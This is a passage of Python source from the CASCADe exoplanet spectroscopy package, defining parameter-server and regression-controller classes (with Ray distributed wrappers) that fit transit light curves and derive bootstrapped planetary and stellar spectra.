return self.cpm_parameters
def get_configuration(self):
"""
Get the CASCADe configuration.
Returns
-------
'cascade.initialize.cascade_configuration'
Singleton containing the cascade configuration.
"""
return self.cascade_configuration
def sync_with_data_server(self, data_server_handle):
"""
Sync the parameter server with the data server.
Returns
-------
None.
"""
ndim, shape, ROI, data_unit, wavelength_unit, time_unit, \
time_bjd_zero, data_product = data_server_handle.get_data_info()
self.data_parameters.ndim = ndim
self.data_parameters.shape = shape
self.data_parameters.ROI = ROI
self.data_parameters.max_spectral_points = \
np.sum(~self.data_parameters.ROI)
self.data_parameters.ncorrect = \
np.where(~self.data_parameters.ROI)[0][0]
self.data_parameters.data_unit = data_unit
self.data_parameters.wavelength_unit = wavelength_unit
self.data_parameters.time_unit = time_unit
self.data_parameters.time_bjd_zero = time_bjd_zero
self.data_parameters.data_product = data_product
def get_data_parameters(self):
"""
Get all parameters characterizing the data.
Returns
-------
simpleNameSpace'
Name spcae holding all relevant parameters describing the dataset.
"""
return self.data_parameters
def initialize_regularization(self):
"""
Initialize the regularization parameter test grid and results array.
Returns
-------
None.
"""
self.regularization.alpha_grid = \
return_lambda_grid(self.cpm_parameters.alpha_min,
self.cpm_parameters.alpha_max,
self.cpm_parameters.n_alpha)
self.regularization.optimal_alpha = \
list(np.repeat(self.regularization.alpha_grid[np.newaxis, :],
self.data_parameters.max_spectral_points, axis=0))
def get_regularization(self):
"""
Get the regularization parameters.
Returns
-------
simpleNameSpace'
Name spcae holding all relevant parameters for the regularization.
"""
return self.regularization
def update_optimal_regulatization(self, new_regularization):
"""
Update the fitted optimal regularization strength.
Parameters
----------
new_regularization : 'simpleNamespace'
New namespace holding the updated optimal regularization.
Returns
-------
None.
"""
for i_alpha, new_alpha in enumerate(new_regularization.optimal_alpha):
if isinstance(new_alpha, float):
self.regularization.optimal_alpha[i_alpha] = new_alpha
def initialize_parameters(self):
"""
Initialize the arrays holding the fit results.
Returns
-------
None.
"""
self.fitted_parameters.regression_results = \
np.zeros((self.cpm_parameters.nboot+1,
self.data_parameters.max_spectral_points,
self.data_parameters.max_spectral_points +
self.cpm_parameters.n_additional_regressors))
self.fitted_parameters.fitted_spectrum = \
np.zeros((self.cpm_parameters.nboot+1,
self.data_parameters.max_spectral_points))
self.fitted_parameters.wavelength_fitted_spectrum = \
np.zeros((self.cpm_parameters.nboot+1,
self.data_parameters.max_spectral_points))
self.fitted_parameters.fitted_time = \
np.zeros((self.cpm_parameters.nboot+1,
self.data_parameters.max_spectral_points,
self.data_parameters.shape[-1]))
self.fitted_parameters.fitted_model = \
np.zeros((self.cpm_parameters.nboot+1,
self.data_parameters.max_spectral_points,
self.data_parameters.shape[-1]))
self.fitted_parameters.fitted_mse = \
np.zeros((self.cpm_parameters.nboot+1,
self.data_parameters.max_spectral_points))
self.fitted_parameters.fitted_aic = \
np.zeros((self.cpm_parameters.nboot+1,
self.data_parameters.max_spectral_points))
self.fitted_parameters.degrees_of_freedom = \
np.zeros((self.cpm_parameters.nboot+1,
self.data_parameters.max_spectral_points))
def update_fitted_parameters(self, new_parameters):
"""Apply new update and returns weights."""
fitted_parameters = copy.deepcopy(self.fitted_parameters)
fitted_parameters.regression_results += \
new_parameters.regression_results
fitted_parameters.fitted_spectrum += \
new_parameters.fitted_spectrum
fitted_parameters.wavelength_fitted_spectrum += \
new_parameters.wavelength_fitted_spectrum
fitted_parameters.fitted_time += \
new_parameters.fitted_time
fitted_parameters.fitted_model += \
new_parameters.fitted_model
fitted_parameters.fitted_mse += \
new_parameters.fitted_mse
fitted_parameters.fitted_aic += \
new_parameters.fitted_aic
fitted_parameters.degrees_of_freedom += \
new_parameters.degrees_of_freedom
self.fitted_parameters = fitted_parameters
def get_fitted_parameters(self):
"""
Return the fitted parameters.
Returns
-------
'simpleNamespace'
Returns a namespace containing all fitted parameters.
"""
return self.fitted_parameters
def add_new_parameters(self, new_parameters):
"""
Add aditional fitted parameters.
Parameters
----------
new_parameters : 'dictionary'
Dictionary defining aditional fit parameters of the regression
model.
Returns
-------
None.
"""
for key, value in new_parameters.items():
setattr(self.fitted_parameters, key, value)
def reset_parameters(self):
"""
Reset all regression and regularization parameters.
Returns
-------
None.
"""
self.initialize_regularization()
self.initialize_parameters()
def initialize_parameter_server(self, data_server_handle):
"""
Initialize the parameter server.
Parameters
----------
data_server_handle : 'regressionDataServer'
Instance of the regressionDataServer class.
Returns
-------
None.
"""
self.sync_with_data_server(data_server_handle)
self.reset_parameters()
def reset_parameter_server(self, cascade_configuration,
data_server_handle):
"""
Reset the parameter server.
Parameters
----------
cascade_configuration : 'cascade.initialize.cascade_configuration'
Singleton containing all cascade configuration parameters.
data_server_handle : 'regressionDataServer'
Instance of the regressionDataServer class.
Returns
-------
None.
"""
self.cascade_configuration = cascade_configuration
self.initialize_regression_configuration()
self.initialize_parameter_server(data_server_handle)
@ray.remote
class rayRegressionParameterServer(regressionParameterServer):
"""Ray wrapper regressionDataServer class."""
def __init__(self, cascade_configuration):
super().__init__(cascade_configuration)
def sync_with_data_server(self, data_server_handle):
"""
Synchronize with data server.
This method of the parameter server uses the handle to the dataserver
to synchronize the parameters defining the dataset.
Returns
-------
None.
"""
ndim, shape, ROI, data_unit, wavelength_unit, time_unit, \
time_bjd_zero, data_product = \
ray.get(data_server_handle.get_data_info.remote())
self.data_parameters.ndim = ndim
self.data_parameters.shape = shape
self.data_parameters.ROI = ROI
self.data_parameters.max_spectral_points = \
np.sum(~self.data_parameters.ROI)
self.data_parameters.ncorrect = \
np.where(~self.data_parameters.ROI)[0][0]
self.data_parameters.data_unit = data_unit
self.data_parameters.wavelength_unit = wavelength_unit
self.data_parameters.time_unit = time_unit
self.data_parameters.time_bjd_zero = time_bjd_zero
self.data_parameters.data_product = data_product
class regressionControler:
"""
The main server for the causal regression modeling.
This class defines the controler for the regression modeling. It starts the
data and parameter server and distributes the tasks to the workers. After
completion it processes all results and stores the extrcted planetary
spectra in spectral data format.
"""
def __init__(self, cascade_configuration, dataset, regressor_dataset,
number_of_workers=1, number_of_data_servers = 1):
self.cascade_configuration = cascade_configuration
self.number_of_workers = number_of_workers
self.number_of_data_servers = number_of_data_servers
self.instantiate_parameter_server()
self.instantiate_data_server(dataset, regressor_dataset)
self.initialize_servers()
self.iterators = SimpleNamespace()
def instantiate_parameter_server(self):
"""
Intstantiate the parameter server.
Returns
-------
None.
"""
self.parameter_server_handle = \
regressionParameterServer(self.cascade_configuration)
def instantiate_data_server(self, dataset, regressor_dataset):
"""
Instantiate the data server.
Parameters
----------
dataset : 'SpectralDataTimeSeries'
The spectral timeseries dataset to be modeled.
regressor_dataset : 'SpectralDataTimeSeries'
The cleaned version of the spectral timeseries dataset used for
construnction the regression matrici.
Returns
-------
None.
"""
#self.data_server_handle = \
# [regressionDataServer(dataset, regressor_dataset)
# for _ in range(self.number_of_workers)]
self.data_server_handle = \
[regressionDataServer(dataset, regressor_dataset)
for _ in range(self.number_of_data_servers)]
def initialize_servers(self):
"""
Initialize both data as wel as the parameter server.
Note that the order of initialization is important: Firts the data
server and then the parameter server.
Returns
-------
None.
"""
for server in self.data_server_handle:
server.initialize_data_server(self.parameter_server_handle)
self.parameter_server_handle.initialize_parameter_server(
self.data_server_handle[0])
def get_fit_parameters_from_server(self):
"""
Get the regression fit parameters from the parameter server.
Returns
-------
fitted_parameters: 'simpleNamespace'
this namespace contrains all relevant fit parameters used in
the extraction and calibration of the planetary signal.
"""
return self.parameter_server_handle.get_fitted_parameters()
def get_regularization_parameters_from_server(self):
"""
Get the regularization parameters from the parameter server.
Returns
-------
'simapleNamespace'
Namsespace containing all regularization varaibles and parameters.
"""
return self.parameter_server_handle.get_regularization()
def get_control_parameters(self):
"""
Get the contraol parameters from the parameter server.
This function returns all relevant parameters needed to determine
the behaviour and settings of the regression modeling.
Returns
-------
control_parameters : 'SimpleNamespace'
This namespace contrain all control parameters of the regression
model.
"""
control_parameters = SimpleNamespace()
control_parameters.data_parameters = \
self.parameter_server_handle.get_data_parameters()
control_parameters.cpm_parameters = \
self.parameter_server_handle.get_regression_parameters()
return control_parameters
def get_lightcurve_model(self):
"""
Get the lightcurve model.
Returns
-------
'simapleNamespace'
Namespace containing all variables and parameters defining the
lightcurve model.
"""
return self.data_server_handle[0].get_lightcurve_model()
def initialize_regression_iterators(self, nchunks=1):
"""
Initialize the iterators required in the regression analysis.
Returns
-------
None.
"""
cpm_parameters = \
self.parameter_server_handle.get_regression_parameters()
data_parameters = self.parameter_server_handle.get_data_parameters()
self.iterators.regressor_indici = \
select_regressors(data_parameters.ROI,
cpm_parameters.nwidth)
self.iterators.bootsptrap_indici, _ = \
make_bootstrap_samples(data_parameters.shape[-1],
cpm_parameters.nboot)
self.iterators.combined_full_model_indici = itertools.product(
enumerate(self.iterators.bootsptrap_indici[:1]),
enumerate(self.iterators.regressor_indici))
self.iterators.n_iterators_full_model = \
data_parameters.max_spectral_points
self.iterators.combined_bootstrap_model_indici = itertools.product(
enumerate(self.iterators.bootsptrap_indici),
enumerate(self.iterators.regressor_indici))
self.iterators.n_iterators_bootstrap_model = \
data_parameters.max_spectral_points*(cpm_parameters.nboot+1)
self.chunk_iterators(nchunks=nchunks)
def get_regression_iterators(self):
"""
Get all iterators used in the regression analysis.
Returns
-------
'simplaeNamespace'
Namespace containing all iterators (data indici, bootstrap indici)
for regression analysis
"""
return self.iterators
@staticmethod
def grouper_it(it, nchunks, number_of_iterators):
"""
Split iterator into chunks.
Parameters
----------
it : 'itertools.product'
Iterator to be split into chunks.
nchunks : 'int'
Number of chuncks.
number_of_iterators : 'int'
Number of iterators.
Yields
------
chunk_it : 'list'
Chunk of the input iterator.
"""
chunk_size = number_of_iterators // nchunks
it = iter(it)
nchunks_times_it = itertools.tee(it, nchunks)
for i, sub_it in enumerate(nchunks_times_it):
start = 0+i*chunk_size
if i+1 == nchunks:
stop = number_of_iterators
else:
stop = chunk_size+i*chunk_size
chunk_it = itertools.islice(sub_it, start, stop)
yield list(chunk_it), stop-start
def chunk_iterators(self, nchunks=1):
"""
Split interators into chunks.
Parameters
----------
nchunk : 'int', optional
Number of chunks in which to split the iterators. The default is 1.
Returns
-------
None.
"""
chunked_full_model_iterator = list(
self.grouper_it(self.iterators.combined_full_model_indici,
nchunks, self.iterators.n_iterators_full_model))
chunked_bootstrap_model_iterator = list(
self.grouper_it(self.iterators.combined_bootstrap_model_indici,
nchunks,
self.iterators.n_iterators_bootstrap_model))
self.iterators.chunked_full_model_iterator = \
chunked_full_model_iterator
self.iterators.chunked_bootstrap_model_iterator = \
chunked_bootstrap_model_iterator
def reset_fit_parameters(self):
"""
Reset the fitted parameters on the parameter server.
Returns
-------
None.
"""
self.parameter_server_handle.reset_parameters()
def add_fit_parameters_to_parameter_server(self, new_parameters):
"""
Add the fited refression parameters to the parameter server.
Parameters
----------
new_parameters : 'simpleNamespace'
Updated fit parameters.
Returns
-------
None.
"""
self.parameter_server_handle.add_new_parameters(new_parameters)
@staticmethod
def get_data_chunck(data_server_handle, regression_selection,
bootstrap_selection):
"""
Get a chunk of the data to be used in the regression analysis.
Parameters
----------
data_server_handle : 'regressioDataServer'
Instance of the regressionDataServer class.
regression_selection : 'tuple'
tuple containing indici defing the data and regression matrix for
all wavelength indici.
bootstrap_selection : 'ndarray'
indici defining the bootstrap sampling.
Returns
-------
regression_data_selection : 'ndarray'
Selected data to be modeled.
regression_matirx_selection : 'ndarray'
data used as design matrix in regression modeling of the
selected data.
"""
regression_data_selection, regression_matirx_selection = \
data_server_handle.get_regression_data(
regression_selection,
bootstrap_indici=bootstrap_selection)
return regression_data_selection, regression_matirx_selection
@staticmethod
def get_data_per_bootstrap_step(data_server_handle, regression_selections,
bootstrap_selection):
"""
Get all data chunks to be used in the regression analysis per bootstrap step.
Parameters
----------
data_server_handle : 'regressioDataServer'
Instance of the regressionDataServer class.
regression_selections : TYPE
DESCRIPTION.
bootstrap_selection : 'ndarray'
indici defining the bootstrap sampling.
Returns
-------
selection_list: 'list'
List with all data and regression matrix selections
"""
selection_list = \
data_server_handle.get_all_regression_data(
regression_selections, bootstrap_indici=bootstrap_selection)
return selection_list
def run_regression_model(self):
"""
Run the regression model.
This method runs the regression method for the instrument systematics
and the transit depth determination.
Returns
-------
None.
"""
# Number of chunks is the number of workers
nchunks = self.number_of_workers
# define the iterator chunks
self.initialize_regression_iterators(nchunks=nchunks)
# This launches workers on the full (non bootstrapped) data set
# and determines the optimal regularization
initial_fit_parameters = \
copy.deepcopy(self.get_fit_parameters_from_server())
initial_regularization = \
self.get_regularization_parameters_from_server()
workers = [
regressionWorker(initial_fit_parameters,
initial_regularization,
iterator_chunk)
for iterator_chunk in self.iterators.chunked_full_model_iterator
]
ndata_server=len(self.data_server_handle)
futures = [w.async_update_loop(self.parameter_server_handle,
self.data_server_handle[iserver%ndata_server])
for iserver, w in enumerate(workers)]
# This launches workers on the bootstrapped data set + original data
# and determines the fit parameters and error there on
updated_regularization = \
copy.deepcopy(self.get_regularization_parameters_from_server())
# re-initialize workers with optimal regularization
futures = [w.update_initial_parameters(initial_fit_parameters,
updated_regularization,
iterator_chunk)
for w, iterator_chunk in zip(
workers, self.iterators.chunked_bootstrap_model_iterator
)
]
# reset parameters on server for final run.
self.parameter_server_handle.reset_parameters()
futures = [w.async_update_loop(self.parameter_server_handle,
self.data_server_handle[iserver%ndata_server])
for iserver, w in enumerate(workers)]
def process_regression_fit(self):
"""
Process the fitted parameters from the regression anlysis.
Returns
-------
None.
"""
fit_parameters = self.get_fit_parameters_from_server()
control_parameters = self.get_control_parameters()
lightcurve_model, ld_correction, ld_coefficients,\
dilution_correction, lightcurve_parameters, \
mid_transit_time = self.get_lightcurve_model()
# correction matricx for limb darkening correction
nwave = lightcurve_model.shape[0]
corr_matrix = np.zeros((nwave, nwave)) + np.identity(nwave)
for i in zip(*np.triu_indices(nwave, k=1)):
coeff, _, _ = ols(lightcurve_model[i[0], :, None],
lightcurve_model[i[1], :])
corr_matrix[i] = coeff
corr_matrix[i[::-1]] = 1/coeff
fitted_baseline_list = []
residuals_list = []
normed_residuals_list = []
corrected_fitted_spectrum_list = []
normed_fitted_spectrum_list = []
error_normed_fitted_spectrum_list = []
wavelength_normed_fitted_spectrum_list = []
stellar_spectrum_list = []
for (bootstrap_selection, models, fit_results,
spectrum) in zip(self.iterators.bootsptrap_indici,
fit_parameters.fitted_model,
fit_parameters.regression_results,
fit_parameters.fitted_spectrum):
W1 = np.delete(
fit_results,
list(np.arange(
control_parameters.cpm_parameters.n_additional_regressors
)
), 1)
K = np.identity(W1.shape[0]) - W1 * corr_matrix
# note spectrum is already corrected for LD using renormalized LC
# correction for differenc in band shape is the corr_matrix
if control_parameters.cpm_parameters.regularize_depth_correction:
input_covariance = np.diag(np.ones_like(spectrum))
input_delta = create_regularization_matrix(
control_parameters.cpm_parameters.reg_type_depth_correction,
len(spectrum), 0)
reg_min = control_parameters.cpm_parameters.alpha_min_depth_correction
reg_max = control_parameters.cpm_parameters.alpha_max_depth_correction
nreg = control_parameters.cpm_parameters.n_alpha_depth_correction
input_alpha = return_lambda_grid(reg_min, reg_max, nreg)
results = ridge(K, spectrum, input_covariance,
input_delta, input_alpha)
corrected_spectrum = results[0]
if (results[-2] <= reg_min) | (results[-2] >= reg_max):
warnings.warn("optimal regularization value of {} used in "
"TD subtraction correction outside the "
"range [{}, {}]".format(results[-2], reg_min,
reg_max))
else:
corrected_spectrum, _, _ = ols(K, spectrum)
corrected_fitted_spectrum_list.append(corrected_spectrum)
baseline_model = np.zeros(control_parameters.data_parameters.shape)
residual = np.ma.zeros(control_parameters.data_parameters.shape)
normed_residual = np.ma.zeros(control_parameters.data_parameters.shape)
lc_model = lightcurve_model[..., bootstrap_selection]
normed_spectrum = \
np.zeros((control_parameters.
data_parameters.max_spectral_points))
error_normed_spectrum = \
np.zeros(control_parameters.
data_parameters.max_spectral_points)
wavelength_normed_spectrum = \
np.zeros((control_parameters.
data_parameters.max_spectral_points))
regression_data_selections = \
self.get_data_per_bootstrap_step(self.data_server_handle[0],
self.iterators.regressor_indici,
bootstrap_selection)
for ipixel, (regression_selection, (regression_data_selection, _)) in\
enumerate(zip(self.iterators.regressor_indici,
regression_data_selections)):
(il, _), (_, _), nwave = regression_selection
data_unscaled, wavelength, phase, covariance, mask= \
regression_data_selection
lc = lc_model[il, :]
base = models[ipixel] - (corrected_spectrum)[ipixel]*lc
baseline_model[il, :] = base
residual[il, :] = np.ma.array(data_unscaled - models[ipixel],
mask=mask)
data_normed = data_unscaled/base
covariance_normed = covariance*np.diag(base**-2)
normed_depth, error_normed_depth, sigma_hat = \
ols(lc[:, np.newaxis], data_normed-1.0,
covariance=covariance_normed)
normed_residual[il, :] = np.ma.array(data_normed-1.0-normed_depth*lc,
mask=mask)
normed_spectrum[ipixel] = \
normed_depth*dilution_correction[il, 0]
error_normed_spectrum[ipixel] = \
error_normed_depth*dilution_correction[il, 0]
wavelength_normed_spectrum[ipixel] = wavelength
fitted_baseline_list.append(baseline_model)
residuals_list.append(residual)
normed_residuals_list.append(normed_residual)
normed_fitted_spectrum_list.append(normed_spectrum)
error_normed_fitted_spectrum_list.append(
error_normed_spectrum)
wavelength_normed_fitted_spectrum_list.append(
wavelength_normed_spectrum)
stellar_spectrum_list.append(corrected_spectrum/normed_spectrum)
corrected_fitted_spectrum = np.array(corrected_fitted_spectrum_list)
fitted_baseline = np.array(fitted_baseline_list)
fit_residuals = np.ma.array(residuals_list)
normed_fit_residuals = np.ma.array(normed_residuals_list)
normed_fitted_spectrum = np.array(normed_fitted_spectrum_list)
error_normed_fitted_spectrum = \
np.array(error_normed_fitted_spectrum_list)
wavelength_normed_fitted_spectrum =\
np.array(wavelength_normed_fitted_spectrum_list)
stellar_spectrum = np.array(stellar_spectrum_list)
prosessed_results = \
{'corrected_fitted_spectrum': corrected_fitted_spectrum,
'fitted_baseline': fitted_baseline,
'fit_residuals': fit_residuals,
'normed_fit_residuals': normed_fit_residuals,
'normed_fitted_spectrum': normed_fitted_spectrum,
'error_normed_fitted_spectrum': error_normed_fitted_spectrum,
'wavelength_normed_fitted_spectrum':
wavelength_normed_fitted_spectrum,
'stellar_spectrum': stellar_spectrum}
self.add_fit_parameters_to_parameter_server(prosessed_results)
def post_process_regression_fit(self):
"""
Post processing of the regression analysis.
Returns
-------
None.
"""
fit_parameters = self.get_fit_parameters_from_server()
control_parameters = self.get_control_parameters()
lightcurve_model, ld_correction, ld_coefficients, \
dilution_correction, lightcurve_parameters, \
mid_transit_time = self.get_lightcurve_model()
sigma_cut = control_parameters.cpm_parameters.sigma_mse_cut
bad_wavelength_mask = \
(fit_parameters.fitted_mse[0, :] >
np.median(fit_parameters.fitted_mse[0, :])*sigma_cut)
bad_wavelength_mask = \
np.repeat(bad_wavelength_mask[np.newaxis, :],
control_parameters.cpm_parameters.nboot+1,
axis=0)
fitted_spectrum = \
np.ma.array(fit_parameters.corrected_fitted_spectrum.copy(),
mask=bad_wavelength_mask.copy())
stellar_spectrum = \
np.ma.array(fit_parameters.stellar_spectrum.copy(),
mask=bad_wavelength_mask.copy())
normed_spectrum = \
np.ma.array(fit_parameters.normed_fitted_spectrum.copy(),
mask=bad_wavelength_mask.copy())
error_normed_spectrum = \
np.ma.array(fit_parameters.error_normed_fitted_spectrum.copy(),
mask=bad_wavelength_mask.copy())
wavelength_normed_spectrum = \
np.ma.array(
fit_parameters.wavelength_normed_fitted_spectrum.copy(),
mask=bad_wavelength_mask.copy())
if lightcurve_parameters['transittype'] == 'secondary':
from cascade.exoplanet_tools import transit_to_eclipse
normed_spectrum, error_normed_spectrum = \
transit_to_eclipse(normed_spectrum,
uncertainty=error_normed_spectrum)
# transfrom to percent by multiplying by 100.
# Note!!!!! this has to be done after transit_to_eclipse!!!!!
normed_spectrum.data[...] = normed_spectrum.data*100
error_normed_spectrum.data[...] = error_normed_spectrum.data*100
from astropy.stats import mad_std
# bootstrapped spectrum (not normalized)
median_not_normalized_depth_bootstrap = \
np.ma.median(fitted_spectrum[1:, :], axis=1)
spectrum_bootstrap = \
np.ma.median(fitted_spectrum[1:, :], axis=0)
error_spectrum_bootstrap = \
mad_std((fitted_spectrum[1:, :].T -
median_not_normalized_depth_bootstrap).T,
axis=0, ignore_nan=True)
# 95% confidense interval non normalized transit depth
n = len(median_not_normalized_depth_bootstrap)
sort = sorted(median_not_normalized_depth_bootstrap)
nn_TD_min, nn_TD, nn_TD_max = \
(sort[int(n * 0.05)], sort[int(n * 0.5)], sort[int(n * 0.95)])
# normalized spectrum
median_depth = np.ma.median(normed_spectrum[0, :])
# bootstrapped normalized spectrum
median_depth_bootstrap = np.ma.median(normed_spectrum[1:, :], axis=1)
normed_spectrum_bootstrap = \
np.ma.median(normed_spectrum[1:, :], axis=0)
error_normed_spectrum_bootstrap = \
mad_std((normed_spectrum[1:, :].T - median_depth_bootstrap).T,
axis=0, ignore_nan=True)
# 95% confidense interval
n = len(median_depth_bootstrap)
sort = sorted(median_depth_bootstrap)
TD_min, TD, TD_max = \
(sort[int(n * 0.05)], sort[int(n * 0.5)], sort[int(n * 0.95)])
# bootstrapped stellar spectrum
median_stellar_spectrum = np.ma.median(stellar_spectrum[1:, :], axis=1)
stellar_spectrum_bootstrap = \
np.ma.median(stellar_spectrum[1:, :], axis=0)
error_stellar_spectrum_bootstrap = \
mad_std((stellar_spectrum[1:, :].T - median_stellar_spectrum).T,
axis=0, ignore_nan=True)
# 95% confidense interval
n = len(median_stellar_spectrum)
sort = sorted(median_stellar_spectrum)
SF_min, SF, SF_max = \
(sort[int(n * 0.05)], sort[int(n * 0.5)], sort[int(n * 0.95)])
observing_time = control_parameters.data_parameters.time_bjd_zero
data_product = control_parameters.data_parameters.data_product
curent_data = time_module.localtime()
creation_time = '{}_{}_{}:{}_{}_{}'.format(curent_data.tm_year,
curent_data.tm_mon,
curent_data.tm_mday,
curent_data.tm_hour,
curent_data.tm_min,
curent_data.tm_sec)
auxilary_data = {'TDDEPTH': [nn_TD_min, nn_TD, nn_TD_max],
'MODELRP': lightcurve_parameters['rp'],
'MODELA': lightcurve_parameters['a'],
'MODELINC': lightcurve_parameters['inc']*u.deg,
'MODELECC': lightcurve_parameters['ecc'],
'MODELW': lightcurve_parameters['w']*u.deg,
'MODELEPH': lightcurve_parameters['t0'],
'MODELPER': lightcurve_parameters['p'],
'VERSION': __version__,
'CREATIME': creation_time,
'OBSTIME': observing_time,
'MIDTTIME': mid_transit_time,
'DATAPROD': data_product}
# non normlized dataset
wavelength_unit = control_parameters.data_parameters.wavelength_unit
data_unit = control_parameters.data_parameters.data_unit
non_normalized_exoplanet_spectrum_bootstrap = \
SpectralData(wavelength=wavelength_normed_spectrum[0, :],
wavelength_unit=wavelength_unit,
data=spectrum_bootstrap,
data_unit=data_unit,
uncertainty=error_spectrum_bootstrap,
)
non_normalized_exoplanet_spectrum_bootstrap.add_auxilary(
**auxilary_data
)
# non normalized stellar dataset
stellar_auxilary_data = copy.deepcopy(auxilary_data)
stellar_auxilary_data.pop('TDDEPTH')
stellar_auxilary_data['STLRFLUX'] = [SF_min, SF, SF_max]
data_unit = control_parameters.data_parameters.data_unit
non_normalized_stellar_spectrum_bootstrap = \
SpectralData(wavelength=wavelength_normed_spectrum[0, :],
wavelength_unit=wavelength_unit,
data=stellar_spectrum_bootstrap,
data_unit=data_unit,
uncertainty=error_stellar_spectrum_bootstrap,
)
non_normalized_stellar_spectrum_bootstrap.add_auxilary(
**stellar_auxilary_data
)
# normalized datset
auxilary_data['TDDEPTH'] = [median_depth]
data_unit = u.percent
exoplanet_spectrum = \
SpectralData(wavelength=wavelength_normed_spectrum[0, :],
wavelength_unit=wavelength_unit,
data=normed_spectrum[0, :],
data_unit=data_unit,
uncertainty=error_normed_spectrum[0, :],
)
exoplanet_spectrum.add_auxilary(**auxilary_data)
# normalized bootstrapped dataset
auxilary_data['TDDEPTH'] = [TD_min, TD, TD_max]
exoplanet_spectrum_bootstrap = \
SpectralData(wavelength=wavelength_normed_spectrum[0, :],
wavelength_unit=wavelength_unit,
data=normed_spectrum_bootstrap,
data_unit=data_unit,
uncertainty=error_normed_spectrum_bootstrap,
)
exoplanet_spectrum_bootstrap.add_auxilary(**auxilary_data)
fitted_transit_model = \
SpectralDataTimeSeries(
wavelength=wavelength_normed_spectrum[0, :],
wavelength_unit=wavelength_unit,
data=(lightcurve_model.T*normed_spectrum_bootstrap).T,
data_unit=data_unit,
uncertainty=(lightcurve_model.T *
error_normed_spectrum_bootstrap).T,
time=fit_parameters.fitted_time[0, 0, :],
time_unit=control_parameters.data_parameters.time_unit
)
fitted_transit_model.add_auxilary(**auxilary_data)
# timeseries baseline
nboot, nwave, ntime = fit_parameters.fitted_time.shape
uniq_time = fit_parameters.fitted_time[0, 0, :]
baseline_bootstrap = np.zeros((nwave, ntime))
normed_residual_bootstrap = np.ma.zeros((nwave, ntime))
error_baseline_bootstrap = np.zeros_like(baseline_bootstrap)
error_normed_residual_bootstrap = np.ma.zeros((nwave, ntime))
for it, time in enumerate(uniq_time):
for il in range(nwave):
idx = np.where(fit_parameters.fitted_time[1:, il, :] == time)
selection = \
fit_parameters.fitted_baseline[idx[0]+1, il, idx[1]]
baseline_bootstrap[il, it] = np.ma.median(selection)
error_baseline_bootstrap[il, it] = mad_std(selection,
ignore_nan=True)
selection = \
fit_parameters.normed_fit_residuals[idx[0]+1, il, idx[1]]
normed_residual_bootstrap[il, it] = np.ma.median(selection)
error_normed_residual_bootstrap[il, it] = mad_std(selection,
ignore_nan=True)
time_baseline_bootstrap = uniq_time
wavelength_baseline_bootstrap = wavelength_normed_spectrum[0, :]
baseline_mask = exoplanet_spectrum_bootstrap.mask
baseline_mask = \
np.repeat(baseline_mask[:, np.newaxis],
len(uniq_time),
axis=1)
residual_mask = np.logical_or(normed_residual_bootstrap.mask,
baseline_mask)
# from cascade.data_model import SpectralDataTimeSeries
data_unit = control_parameters.data_parameters.data_unit
time_unit = control_parameters.data_parameters.time_unit
fitted_systematics_bootstrap = SpectralDataTimeSeries(
wavelength=wavelength_baseline_bootstrap,
wavelength_unit=wavelength_unit,
data=baseline_bootstrap,
data_unit=data_unit,
uncertainty=error_baseline_bootstrap,
time=time_baseline_bootstrap,
time_unit=time_unit,
mask=baseline_mask)
data_unit = u.dimensionless_unscaled
time_unit = control_parameters.data_parameters.time_unit
fitted_residuals_bootstrap = SpectralDataTimeSeries(
wavelength=wavelength_baseline_bootstrap,
wavelength_unit=wavelength_unit,
data=normed_residual_bootstrap,
data_unit=data_unit,
uncertainty=error_normed_residual_bootstrap,
time=time_baseline_bootstrap,
time_unit=time_unit,
mask=residual_mask)
post_prosessed_results = \
{'exoplanet_spectrum': exoplanet_spectrum,
'exoplanet_spectrum_bootstrap': exoplanet_spectrum_bootstrap,
'non_normalized_exoplanet_spectrum_bootstrap':
non_normalized_exoplanet_spectrum_bootstrap,
'fitted_systematics_bootstrap': fitted_systematics_bootstrap,
'fitted_residuals_bootstrap': fitted_residuals_bootstrap,
'fitted_transit_model': fitted_transit_model,
'non_normalized_stellar_spectrum_bootstrap':
non_normalized_stellar_spectrum_bootstrap}
self.add_fit_parameters_to_parameter_server(post_prosessed_results)
@ray.remote
class rayRegressionControler(regressionControler):
"""Ray wrapper regressionControler class."""
def __init__(self, cascade_configuration, dataset, regressor_dataset,
number_of_workers=1, number_of_data_servers=1):
super().__init__(cascade_configuration, dataset, regressor_dataset,
number_of_workers=number_of_workers,
number_of_data_servers=number_of_data_servers)
def instantiate_parameter_server(self):
"""
Create an handle to the parameter server.
Returns
-------
None.
"""
self.parameter_server_handle = \
rayRegressionParameterServer.remote(self.cascade_configuration)
def instantiate_data_server(self, dataset, regressor_dataset):
"""
Create an handle to the data server.
Parameters
----------
dataset : TYPE
DESCRIPTION.
regressor_dataset : TYPE
DESCRIPTION.
Returns
-------
None.
"""
# self.data_server_handle = \
# [rayRegressionDataServer.remote(dataset, regressor_dataset)
# for _ in range(self.number_of_workers)]
self.data_server_handle = \
[rayRegressionDataServer.remote(dataset, regressor_dataset)
for _ in range(self.number_of_data_servers)]
def initialize_servers(self):
"""
Initialize both the data and the parameter server.
Note that the order of initialization is important: Firts the data
server and then the parameter server.
Returns
-------
None.
"""
# ftr = self.data_server_handle[0].\
# initialize_data_server.remote(self.parameter_server_handle)
ftr = [server.initialize_data_server.remote(self.parameter_server_handle)
for server in self.data_server_handle]
ray.get(ftr)
ftr = self.parameter_server_handle.\
initialize_parameter_server.remote(self.data_server_handle[0])
ray.get(ftr)
def get_fit_parameters_from_server(self):
"""
Grab fitted regression parameters from the parameter server.
Returns
-------
TYPE
DESCRIPTION.
"""
return ray.get(
self.parameter_server_handle.get_fitted_parameters.remote()
)
def get_regularization_parameters_from_server(self):
"""
Get the regularization parameters from the parameter server.
Returns
-------
TYPE
DESCRIPTION.
"""
return ray.get(
self.parameter_server_handle.get_regularization.remote()
)
def get_control_parameters(self):
"""
Get the regression control parameters from the parameter server.
Returns
-------
control_parameters : TYPE
DESCRIPTION.
"""
control_parameters = SimpleNamespace()
control_parameters.data_parameters = \
ray.get(self.parameter_server_handle.get_data_parameters.remote())
control_parameters.cpm_parameters = \
ray.get(
self.parameter_server_handle.get_regression_parameters.remote()
)
return control_parameters
@ray.method(num_returns=6)
def get_lightcurve_model(self):
"""
Get the lightcurve model from the data server.
Returns
-------
TYPE
DESCRIPTION.
"""
return ray.get(self.data_server_handle[0].get_lightcurve_model.remote())
def initialize_regression_iterators(self, nchunks=1):
"""
Initialize all iterators used in the regression analysis.
Returns
-------
None.
"""
cpm_parameters = \
ray.get(self.parameter_server_handle.
get_regression_parameters.remote())
data_parameters = \
ray.get(self.parameter_server_handle.get_data_parameters.remote())
self.iterators.regressor_indici = \
